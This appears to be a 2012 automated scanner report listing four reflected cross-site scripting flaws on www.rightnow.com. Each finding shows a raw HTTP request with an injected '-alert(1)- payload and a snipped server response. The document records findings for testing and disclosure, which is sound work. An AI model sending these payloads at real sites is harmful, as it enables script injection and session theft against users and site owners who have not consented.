1. Cross-site scripting (reflected)
1.1. http://www.rightnow.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.rightnow.com/favicon.ico [REST URL parameter 1]
1.3. http://www.rightnow.com/floatbox/floatbox.css [REST URL parameter 1]
1.4. http://www.rightnow.com/floatbox/floatbox.css [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://www.rightnow.com |
Path: | / |
GET /?867f8'-alert(1)- Host: www.rightnow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 10 |
HTTP/1.1 200 OK Date: Sun, 08 Jan 2012 02:19:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=j1dgjc0c57 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 103937 ... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><!-- ...[SNIP]... jQuery.get('http://www { c_id: existingRightNowContactID page_url: 'http://www.rightnow.com/ isPremium: '0', time: tsTimeStamp }); } if(includeOmniture != "no") { jQuery.ajaxSetup({async: false}); jQuery. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.rightnow.com |
Path: | /favicon.ico |
GET /favicon.icoeb533'-alert(1)- Host: www.rightnow.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v11nguomg Content-Length: 10 |
HTTP/1.1 404 Not Found Date: Sun, 08 Jan 2012 02:20:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 39509 ... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><!-- ...[SNIP]... jQuery.get('http://www { c_id: existingRightNowContactID page_url: 'http://www.rightnow.com isPremium: '0', time: tsTimeStamp }); } if(includeOmniture != "no") { jQuery.ajaxSetup({async: false}); jQuery.ge ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.rightnow.com |
Path: | /floatbox/floatbox.css |
GET /floatbox777ee'-alert(1)- Host: www.rightnow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 Accept: text/css,*/*;q=0.1 Referer: http://www.rightnow.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v11nguomg Content-Length: 10 |
HTTP/1.1 404 Not Found Date: Sun, 08 Jan 2012 02:19:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 39519 ... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><!-- ...[SNIP]... jQuery.get('http://www { c_id: existingRightNowContactID page_url: 'http://www.rightnow.com isPremium: '0', time: tsTimeStamp }); } if(includeOmniture != "no") { jQuery.ajaxSetup({async: false}); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.rightnow.com |
Path: | /floatbox/floatbox.css |
GET /floatbox/floatbox.css4e7bf'-alert(1)- Host: www.rightnow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 Accept: text/css,*/*;q=0.1 Referer: http://www.rightnow.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v11nguomg Content-Length: 10 |
HTTP/1.1 404 Not Found Date: Sun, 08 Jan 2012 02:19:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 39519 ... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><!-- ...[SNIP]... get('http://www.rightnow { c_id: existingRightNowContactID page_url: 'http://www.rightnow.com isPremium: '0', time: tsTimeStamp }); } if(includeOmniture != "no") { jQuery.ajaxSetup({async: false}); jQuery.ge ...[SNIP]... |